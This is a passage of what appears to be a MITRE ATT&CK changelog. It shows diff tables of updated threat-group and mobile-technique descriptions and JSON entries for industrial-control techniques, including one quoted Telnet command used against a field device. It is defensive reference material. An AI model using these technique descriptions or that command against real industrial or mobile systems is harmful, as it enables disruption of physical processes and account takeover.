| > | n: DHS/CISA Ransomware Targeting Healthcare October 2020) | > | diverse arsenal of tools and has conducted ransomware campai | ||
| > | gns against a variety of organizations, ranging from major c | ||||
| > | orporations to hospitals.(Citation: CrowdStrike Ryuk January | ||||
| > | 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare Oc | ||||
| > | tober 2020)(Citation: CrowdStrike Wizard Spider October 2020 | ||||
| > | ) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT28](https://attack.mitre.org/groups/G0007) is a threat g | t | 1 | [APT28](https://attack.mitre.org/groups/G0007) is a threat g |
| > | roup that has been attributed to Russia's General Staff Main | > | roup that has been attributed to Russia's General Staff Main | ||
| > | Intelligence Directorate (GRU) 85th Main Special Service Ce | > | Intelligence Directorate (GRU) 85th Main Special Service Ce | ||
| > | nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub | > | nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub | ||
| > | August 2020) This group has been active since at least 2004 | > | August 2020)(Citation: Cybersecurity Advisory GRU Brute For | ||
| > | .(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Tech | > | ce Campaign July 2021) This group has been active since at l | ||
| > | nica GRU indictment Jul 2018) (Citation: Crowdstrike DNC Jun | > | east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: | ||
| > | e 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG- | > | Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike | ||
| > | 4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZ | > | DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork | ||
| > | ZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: | > | s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G | ||
| > | Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018 | > | RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: | ||
| > | ) (Citation: ESET Zebrocy May 2019) [APT28](https://attack. | > | Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018 | ||
| > | mitre.org/groups/G0007) reportedly compromised the Hillary C | > | )(Citation: ESET Zebrocy May 2019) [APT28](https://attack.m | ||
| > | linton campaign, the Democratic National Committee, and the | > | itre.org/groups/G0007) reportedly compromised the Hillary Cl | ||
| > | Democratic Congressional Campaign Committee in 2016 in an at | > | inton campaign, the Democratic National Committee, and the D | ||
| > | tempt to interfere with the U.S. presidential election. (Cit | > | emocratic Congressional Campaign Committee in 2016 in an att | ||
| > | ation: Crowdstrike DNC June 2016) In 2018, the US indicted f | > | empt to interfere with the U.S. presidential election. (Cita | ||
| > | ive GRU Unit 26165 officers associated with [APT28](https:// | > | tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi | ||
| > | attack.mitre.org/groups/G0007) for cyber operations (includi | > | ve GRU Unit 26165 officers associated with [APT28](https://a | ||
| > | ng close-access operations) conducted between 2014 and 2018 | > | ttack.mitre.org/groups/G0007) for cyber operations (includin | ||
| > | against the World Anti-Doping Agency (WADA), the US Anti-Dop | > | g close-access operations) conducted between 2014 and 2018 a | ||
| > | ing Agency, a US nuclear facility, the Organization for the | > | gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi | ||
| > | Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chem | > | ng Agency, a US nuclear facility, the Organization for the P | ||
| > | icals Laboratory, and other organizations.(Citation: US Dist | > | rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi | ||
| > | rict Court Indictment GRU Oct 2018) Some of these were condu | > | cals Laboratory, and other organizations.(Citation: US Distr | ||
| > | cted with the assistance of GRU Unit 74455, which is also re | > | ict Court Indictment GRU Oct 2018) Some of these were conduc | ||
| > | ferred to as [Sandworm Team](https://attack.mitre.org/groups | > | ted with the assistance of GRU Unit 74455, which is also ref | ||
| > | /G0034). | > | erred to as [Sandworm Team](https://attack.mitre.org/groups/ | ||
| > | G0034). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT29](https://attack.mitre.org/groups/G0016) is threat gro | t | 1 | [APT29](https://attack.mitre.org/groups/G0016) is threat gro |
| > | up that has been attributed to Russia's Foreign Intelligence | > | up that has been attributed to Russia's Foreign Intelligence | ||
| > | Service (SVR).(Citation: White House Imposing Costs RU Gov | > | Service (SVR).(Citation: White House Imposing Costs RU Gov | ||
| > | April 2021)(Citation: UK Gov Malign RIS Activity April 2021) | > | April 2021)(Citation: UK Gov Malign RIS Activity April 2021) | ||
| > | They have operated since at least 2008, often targeting gov | > | They have operated since at least 2008, often targeting gov | ||
| > | ernment networks in Europe and NATO member countries, resear | > | ernment networks in Europe and NATO member countries, resear | ||
| > | ch institutes, and think tanks. [APT29](https://attack.mitre | > | ch institutes, and think tanks. [APT29](https://attack.mitre | ||
| > | .org/groups/G0016) reportedly compromised the Democratic Nat | > | .org/groups/G0016) reportedly compromised the Democratic Nat | ||
| > | ional Committee starting in the summer of 2015.(Citation: F- | > | ional Committee starting in the summer of 2015.(Citation: F- | ||
| > | Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr | > | Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr | ||
| > | owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia | > | owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia | ||
| > | SolarWinds April 2021) In April 2021, the US and UK governm | > | SolarWinds April 2021) In April 2021, the US and UK governm | ||
| > | ents attributed the SolarWinds supply chain compromise cyber | > | ents attributed the SolarWinds supply chain compromise cyber | ||
| > | operation to the SVR; public statements included citations | > | operation to the SVR; public statements included citations | ||
| > | to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear | > | to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear | ||
| > | , and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds | > | , and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds | ||
| > | April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) | > | April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) | ||
| > | Victims of this campaign included government, consulting, t | > | Victims of this campaign included government, consulting, t | ||
| > | echnology, telecom, and other organizations in North America | > | echnology, telecom, and other organizations in North America | ||
| > | , Europe, Asia, and the Middle East. Industry reporting refe | > | , Europe, Asia, and the Middle East. Industry reporting refe | ||
| > | rred to the actors involved in this campaign as UNC2452, NOB | > | rred to the actors involved in this campaign as UNC2452, NOB | ||
| > | ELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUN | > | ELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUN | ||
| > | BURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2 | > | BURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2 | ||
| > | 021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Cit | > | 021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Cit | ||
| > | ation: Volexity SolarWinds) | > | ation: Volexity SolarWinds)(Citation: Cybersecurity Advisory | ||
| > | SVR TTP May 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT3](https://attack.mitre.org/groups/G0022) is a China-bas | t | 1 | [APT3](https://attack.mitre.org/groups/G0022) is a China-bas |
| > | ed threat group that researchers have attributed to China's | > | ed threat group that researchers have attributed to China's | ||
| > | Ministry of State Security. (Citation: FireEye Clandestine W | > | Ministry of State Security.(Citation: FireEye Clandestine Wo | ||
| > | olf) (Citation: Recorded Future APT3 May 2017) This group is | > | lf)(Citation: Recorded Future APT3 May 2017) This group is r | ||
| > | responsible for the campaigns known as Operation Clandestin | > | esponsible for the campaigns known as Operation Clandestine | ||
| > | e Fox, Operation Clandestine Wolf, and Operation Double Tap. | > | Fox, Operation Clandestine Wolf, and Operation Double Tap.(C | ||
| > | (Citation: FireEye Clandestine Wolf) (Citation: FireEye Ope | > | itation: FireEye Clandestine Wolf)(Citation: FireEye Operati | ||
| > | ration Double Tap) As of June 2015, the group appears to hav | > | on Double Tap) As of June 2015, the group appears to have sh | ||
| > | e shifted from targeting primarily US victims to primarily p | > | ifted from targeting primarily US victims to primarily polit | ||
| > | olitical organizations in Hong Kong. (Citation: Symantec Buc | > | ical organizations in Hong Kong.(Citation: Symantec Buckeye) | ||
| > | keye) MITRE has also developed an APT3 Adversary Emulation | > | In 2017, MITRE developed an APT3 Adversary Emulation Plan. | ||
| > | Plan.(Citation: APT3 Adversary Emulation Plan) | > | (Citation: APT3 Adversary Emulation Plan) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT32](https://attack.mitre.org/groups/G0050) is a threat g | t | 1 | [APT32](https://attack.mitre.org/groups/G0050) is a suspecte |
| > | roup that has been active since at least 2014. The group has | > | d Vietnam-based threat group that has been active since at l | ||
| > | targeted multiple private sector industries as well as with | > | east 2014. The group has targeted multiple private sector in | ||
| > | foreign governments, dissidents, and journalists with a str | > | dustries as well as foreign governments, dissidents, and jou | ||
| > | ong focus on Southeast Asian countries like Vietnam, the Phi | > | rnalists with a strong focus on Southeast Asian countries li | ||
| > | lippines, Laos, and Cambodia. They have extensively used str | > | ke Vietnam, the Philippines, Laos, and Cambodia. They have e | ||
| > | ategic web compromises to compromise victims. The group is b | > | xtensively used strategic web compromises to compromise vict | ||
| > | elieved to be Vietnam-based.(Citation: FireEye APT32 May 201 | > | ims.(Citation: FireEye APT32 May 2017)(Citation: Volexity Oc | ||
| > | 7)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET Oc | > | eanLotus Nov 2017)(Citation: ESET OceanLotus) | ||
| > | eanLotus) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [PittyTiger](https://attack.mitre.org/groups/G0011) is a thr | t | 1 | [PittyTiger](https://attack.mitre.org/groups/G0011) is a thr |
| > | eat group believed to operate out of China that uses multipl | > | eat group believed to operate out of China that uses multipl | ||
| > | e different types of malware to maintain command and control | > | e different types of malware to maintain command and control | ||
| > | . (Citation: Bizeul 2014) (Citation: Villeneuve 2014) | > | .(Citation: Bizeul 2014)(Citation: Villeneuve 2014) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus | t | 1 | [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus |
| > | sia-based threat group that has targeted critical infrastruc | > | sia-based threat group that has targeted critical infrastruc | ||
| > | ture. The group has been observed utilizing TRITON, a malwar | > | ture. The group has been observed utilizing [TRITON](https:/ | ||
| > | e framework designed to manipulate industrial safety systems | > | /attack.mitre.org/software/S0609), a malware framework desig | ||
| > | .(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Vele | > | ned to manipulate industrial safety systems.(Citation: FireE | ||
| > | s 2018)(Citation: FireEye TEMP.Veles JSON April 2019) | > | ye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: | ||
| > | FireEye TEMP.Veles JSON April 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North | t | 1 | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North |
| > | Korean-based threat group that has been active since at leas | > | Korea-based cyber espionage group that has been active since | ||
| > | t September 2013. The group initially focused on targeting K | > | at least 2012. The group initially focused on targeting Sou | ||
| > | orean think tanks and DPRK/nuclear-related targets, expandin | > | th Korean government entities, think tanks, and individuals | ||
| > | g recently to the United States, Russia, and Europe. The gro | > | identified as experts in various fields, and expanded its op | ||
| > | up was attributed as the actor behind the Korea Hydro & Nucl | > | erations to include the United States, Russia, Europe, and t | ||
| > | ear Power Co. compromise.(Citation: EST Kimsuky April 2019)( | > | he UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has | ||
| > | Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsu | > | focused its intelligence collection activities on foreign po | ||
| > | ky November 2020) | > | licy and national security issues related to the Korean peni | ||
| > | nsula, nuclear policy, and sanctions.(Citation: EST Kimsuky | ||||
| > | April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybe | ||||
| > | reason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky | ||||
| > | June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](htt | ||||
| > | ps://attack.mitre.org/groups/G0094) was assessed to be respo | ||||
| > | nsible for the 2014 Korea Hydro & Nuclear Power Co. compromi | ||||
| > | se; other notable campaigns include Operation STOLEN PENCIL | ||||
| > | (2018), Operation Kabar Cobra (2019), and Operation Smoke Sc | ||||
| > | reen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Cita | ||||
| > | tion: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab K | ||||
| > | imsuky Kabar Cobra Feb 2019) North Korean group definitions | ||||
| > | are known to have significant overlap, and some security re | ||||
| > | searchers report all North Korean state-sponsored cyber acti | ||||
| > | vity under the name [Lazarus Group](https://attack.mitre.org | ||||
| > | /groups/G0032) instead of tracking clusters or subgroups. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | An adversary could exploit signaling system vulnerabilities | t | 1 | An adversary could exploit signaling system vulnerabilities |
| > | to redirect calls or text messages (SMS) to a phone number u | > | to redirect calls or text messages (SMS) to a phone number u | ||
| > | nder the attacker's control. The adversary could then act as | > | nder the attacker's control. The adversary could then act as | ||
| > | a man-in-the-middle to intercept or manipulate the communic | > | an adversary-in-the-middle to intercept or manipulate the c | ||
| > | ation. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Cit | > | ommunication. (Citation: Engel-SS7) (Citation: Engel-SS7-200 | ||
| > | ation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CS | > | 8) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citat | ||
| > | RIC5-WG10-FinalReport) Interception of SMS messages could en | > | ion: CSRIC5-WG10-FinalReport) Interception of SMS messages c | ||
| > | able adversaries to obtain authentication codes used for mul | > | ould enable adversaries to obtain authentication codes used | ||
| > | ti-factor authentication(Citation: TheRegister-SS7). | > | for multi-factor authentication(Citation: TheRegister-SS7). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | If network traffic between the mobile device and a remote se | t | 1 | If network traffic between the mobile device and a remote se |
| > | rver is not securely protected, then an attacker positioned | > | rver is not securely protected, then an attacker positioned | ||
| > | on the network may be able to manipulate network communicati | > | on the network may be able to manipulate network communicati | ||
| > | on without being detected. For example, FireEye researchers | > | on without being detected. For example, FireEye researchers | ||
| > | found in 2014 that 68% of the top 1,000 free applications in | > | found in 2014 that 68% of the top 1,000 free applications in | ||
| > | the Google Play Store had at least one Transport Layer Secu | > | the Google Play Store had at least one Transport Layer Secu | ||
| > | rity (TLS) implementation vulnerability potentially opening | > | rity (TLS) implementation vulnerability potentially opening | ||
| > | the applications' network traffic to man-in-the-middle attac | > | the applications' network traffic to adversary-in-the-middle | ||
| > | ks (Citation: FireEye-SSL). | > | attacks (Citation: FireEye-SSL). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | An adversary could convince the mobile network operator (e.g | t | 1 | An adversary could convince the mobile network operator (e.g |
| > | . through social networking, forged identification, or insid | > | . through social networking, forged identification, or insid | ||
| > | er attacks performed by trusted employees) to issue a new SI | > | er attacks performed by trusted employees) to issue a new SI | ||
| > | M card and associate it with an existing phone number and ac | > | M card and associate it with an existing phone number and ac | ||
| > | count (Citation: NYGov-Simswap) (Citation: Motherboard-Simsw | > | count.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswa | ||
| > | ap2). The adversary could then obtain SMS messages or hijack | > | p2) The adversary could then obtain SMS messages or hijack p | ||
| > | phone calls intended for someone else (Citation: Betanews-S | > | hone calls intended for someone else.(Citation: Betanews-Sim | ||
| > | imswap). One use case is intercepting authentication messa | > | swap) One use case is intercepting authentication messages | ||
| > | ges or phone calls to obtain illicit access to online bankin | > | or phone calls to obtain illicit access to online banking or | ||
| > | g or other online accounts, as many online services allow ac | > | other online accounts, as many online services allow accoun | ||
| > | count password resets by sending an authentication code over | > | t password resets by sending an authentication code over SMS | ||
| > | SMS to a phone number associated with the account (Citation | > | to a phone number associated with the account.(Citation: Gu | ||
| > | : Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citatio | > | ardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Kr | ||
| > | n: Krebs-SimSwap)(Citation: TechCrunch-SimSwap). | > | ebs-SimSwap)(Citation: TechCrunch-SimSwap) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT28](https://attack.mitre.org/groups/G0007) is a threat g | t | 1 | [APT28](https://attack.mitre.org/groups/G0007) is a threat g |
| > | roup that has been attributed to Russia's General Staff Main | > | roup that has been attributed to Russia's General Staff Main | ||
| > | Intelligence Directorate (GRU) 85th Main Special Service Ce | > | Intelligence Directorate (GRU) 85th Main Special Service Ce | ||
| > | nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub | > | nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub | ||
| > | August 2020) This group has been active since at least 2004 | > | August 2020)(Citation: Cybersecurity Advisory GRU Brute For | ||
| > | .(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Tech | > | ce Campaign July 2021) This group has been active since at l | ||
| > | nica GRU indictment Jul 2018) (Citation: Crowdstrike DNC Jun | > | east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: | ||
| > | e 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG- | > | Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike | ||
| > | 4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZ | > | DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork | ||
| > | ZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: | > | s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G | ||
| > | Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018 | > | RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: | ||
| > | ) (Citation: ESET Zebrocy May 2019) [APT28](https://attack. | > | Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018 | ||
| > | mitre.org/groups/G0007) reportedly compromised the Hillary C | > | )(Citation: ESET Zebrocy May 2019) [APT28](https://attack.m | ||
| > | linton campaign, the Democratic National Committee, and the | > | itre.org/groups/G0007) reportedly compromised the Hillary Cl | ||
| > | Democratic Congressional Campaign Committee in 2016 in an at | > | inton campaign, the Democratic National Committee, and the D | ||
| > | tempt to interfere with the U.S. presidential election. (Cit | > | emocratic Congressional Campaign Committee in 2016 in an att | ||
| > | ation: Crowdstrike DNC June 2016) In 2018, the US indicted f | > | empt to interfere with the U.S. presidential election. (Cita | ||
| > | ive GRU Unit 26165 officers associated with [APT28](https:// | > | tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi | ||
| > | attack.mitre.org/groups/G0007) for cyber operations (includi | > | ve GRU Unit 26165 officers associated with [APT28](https://a | ||
| > | ng close-access operations) conducted between 2014 and 2018 | > | ttack.mitre.org/groups/G0007) for cyber operations (includin | ||
| > | against the World Anti-Doping Agency (WADA), the US Anti-Dop | > | g close-access operations) conducted between 2014 and 2018 a | ||
| > | ing Agency, a US nuclear facility, the Organization for the | > | gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi | ||
| > | Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chem | > | ng Agency, a US nuclear facility, the Organization for the P | ||
| > | icals Laboratory, and other organizations.(Citation: US Dist | > | rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi | ||
| > | rict Court Indictment GRU Oct 2018) Some of these were condu | > | cals Laboratory, and other organizations.(Citation: US Distr | ||
| > | cted with the assistance of GRU Unit 74455, which is also re | > | ict Court Indictment GRU Oct 2018) Some of these were conduc | ||
| > | ferred to as [Sandworm Team](https://attack.mitre.org/groups | > | ted with the assistance of GRU Unit 74455, which is also ref | ||
| > | /G0034). | > | erred to as [Sandworm Team](https://attack.mitre.org/groups/ | ||
| > | G0034). |
10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-ics-attack",
"phase_name": "inhibit-response-function"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-ics-attack",
"url": "https://collaborate.mitre.org/attackics/index.php/Technique/T0805",
"external_id": "T0805"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Network Traffic: Network Traffic Flow",
"Network Traffic: Network Connection Creation",
"Application Log: Application Log Content",
"Process: Process Termination",
"Operational Databases: Process History/Live Data",
"Operational Databases: Process/Event Alarm"
],
"x_mitre_platforms": [
"Field Controller/RTU/PLC/IED",
"Input/Output Server",
"Device Configuration/Parameters"
],
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-08 13:04:01.612000+00:00\", \"old_value\": \"2020-05-21 17:43:26.506000+00:00\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"Network Traffic: Network Traffic Flow\", \"old_value\": \"Alarm history\"}, \"root['x_mitre_data_sources'][1]\": {\"new_value\": \"Network Traffic: Network Connection Creation\", \"old_value\": \"Data historian\"}, \"root['x_mitre_data_sources'][2]\": {\"new_value\": \"Application Log: Application Log Content\", \"old_value\": \"Network protocol analysis\"}, \"root['x_mitre_data_sources'][3]\": {\"new_value\": \"Process: Process Termination\", \"old_value\": \"Packet capture\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][4]\": \"Operational Databases: Process History/Live Data\", \"root['x_mitre_data_sources'][5]\": \"Operational Databases: Process/Event Alarm\", \"root['x_mitre_platforms'][2]\": \"Device Configuration/Parameters\"}}",
"previous_version": "0.0",
"changelog_mitigations": {
"shared": [
"M0807: Network Allowlists",
"M0810: Out-of-Band Communications Channel",
"M0930: Network Segmentation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-05-21 17:43:26.506000+00:00",
"modified": "2021-10-14 13:04:01.612000+00:00",
"name": "Brute Force I/O",
"description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary\u2019s goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.\n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment, or damage to downstream equipment.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-ics-attack",
"phase_name": "impair-process-control"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-ics-attack",
"url": "https://collaborate.mitre.org/attackics/index.php/Technique/T0806",
"external_id": "T0806"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Network Traffic: Network Traffic Content",
"Application Log: Application Log Content",
"Operational Databases: Process History/Live Data"
],
"x_mitre_platforms": [
"Control Server",
"Field Controller/RTU/PLC/IED"
],
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 13:04:01.612000+00:00\", \"old_value\": \"2020-05-21 17:43:26.506000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary\\u2019s goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.\\n\\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment, or damage to downstream equipment.\", \"old_value\": \"Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n-Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.\\n+Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary\\u2019s goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.\\n+\\n+Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment, or damage to downstream equipment.\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"Network Traffic: Network Traffic Content\", \"old_value\": \"Alarm history\"}, \"root['x_mitre_data_sources'][1]\": {\"new_value\": \"Application Log: Application Log Content\", \"old_value\": \"Sequential event recorder\"}, \"root['x_mitre_data_sources'][2]\": {\"new_value\": \"Operational Databases: Process History/Live Data\", \"old_value\": \"Data historian\"}}, \"iterable_item_removed\": {\"root['x_mitre_data_sources'][3]\": \"Netflow/Enclave netflow\", \"root['x_mitre_data_sources'][4]\": \"Network protocol analysis\", \"root['x_mitre_data_sources'][5]\": \"Packet capture\"}}",
"previous_version": "0.0",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may brute force I/O addresses on a device and at | t | 1 | Adversaries may repetitively or successively change I/O poin |
| > | tempt to exhaustively perform an action. By enumerating the | > | t values to perform an action. Brute Force I/O may be achiev | ||
| > | full range of I/O addresses, an adversary may manipulate a p | > | ed by changing either a range of I/O point values or a singl | ||
| > | rocess function without having to target specific I/O interf | > | e point value repeatedly to manipulate a process function. T | ||
| > | aces. More than one process function manipulation and enumer | > | he adversary\u2019s goal and the information they have about the | ||
| > | ation pass may occur on the targeted I/O range in a brute fo | > | target environment will influence which of the options they | ||
| > | rce attempt. | > | choose. In the case of brute forcing a range of point values | ||
| > | , the adversary may be able to achieve an impact without tar | ||||
| > | geting a specific point. In the case where a single point is | ||||
| > | targeted, the adversary may be able to generate instability | ||||
| > | on the process function associated with that particular poi | ||||
| > | nt. Adversaries may use Brute Force I/O to cause failures w | ||||
| > | ithin various industrial processes. These failures could be | ||||
| > | the result of wear on equipment, or damage to downstream equ | ||||
| > | ipment. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may target and collect data from information rep | t | 1 | Adversaries may target and collect data from information rep |
| > | ositories. This can include sensitive data such as specifica | > | ositories. This can include sensitive data such as specifica | ||
| > | tions, schematics, or diagrams of control system layouts, de | > | tions, schematics, or diagrams of control system layouts, de | ||
| > | vices, and processes. Examples of information repositories i | > | vices, and processes. Examples of information repositories i | ||
| > | nclude reference databases or local machines in the process | > | nclude reference databases or local machines in the process | ||
| > | environment, as well as workstations and databases in the co | > | environment, as well as workstations and databases in the co | ||
| > | rporate network that might contain information about the ICS | > | rporate network that might contain information about the ICS | ||
| > | . Information collected from these systems may provide the a | > | . Information collected from these systems may provide the a | ||
| > | dversary with a better understanding of the operational envi | > | dversary with a better understanding of the operational envi | ||
| > | ronment, vendors used, processes, or procedures of the ICS. | > | ronment, vendors used, processes, or procedures of the ICS. | ||
| > | In a campaign between 2011 and 2013 against ONG organization | ||||
| > | s, Chinese state-sponsored actors searched document reposito | ||||
| > | ries for specific information such as, system manuals, remot | ||||
| > | e terminal unit (RTU) sites, personnel lists, documents that | ||||
| > | included the string \u201cSCAD*\u201d, user credentials, and remote d | ||||
| > | ial-up access information.(Citation: CISA Chinese Gas Pipeli | ||||
| > | ne Intrusion 2011 - 2013 July 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to gain access to a machine via a Gr | t | 1 | Adversaries may attempt to gain access to a machine via a Gr |
| > | aphical User Interface (GUI) to enhance execution capabiliti | > | aphical User Interface (GUI) to enhance execution capabiliti | ||
| > | es. Access to a GUI allows a user to interact with a compute | > | es. Access to a GUI allows a user to interact with a compute | ||
| > | r in a more visual manner than a CLI. A GUI allows users to | > | r in a more visual manner than a CLI. A GUI allows users to | ||
| > | move a cursor and click on interface objects, with a mouse a | > | move a cursor and click on interface objects, with a mouse a | ||
| > | nd keyboard as the main input devices, as opposed to just us | > | nd keyboard as the main input devices, as opposed to just us | ||
| > | ing the keyboard. If physical access is not an option, then | > | ing the keyboard. If physical access is not an option, then | ||
| > | access might be possible via protocols such as VNC on Linux- | > | access might be possible via protocols such as VNC on Linux- | ||
| > | based and Unix-based operating systems, and RDP on Windows o | > | based and Unix-based operating systems, and RDP on Windows o | ||
| > | perating systems. An adversary can use this access to execut | > | perating systems. An adversary can use this access to execut | ||
| > | e programs and applications on the target machine. | > | e programs and applications on the target machine. In the O | ||
| > | ldsmar water treatment attack, adversaries utilized the oper | ||||
| > | ator HMI interface through the graphical user interface. Thi | ||||
| > | s action led to immediate operator detection as they were ab | ||||
| > | le to see the adversary making changes on their screen. (Cit | ||||
| > | ation: Oldsmar Water Treatment Attack Feb 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
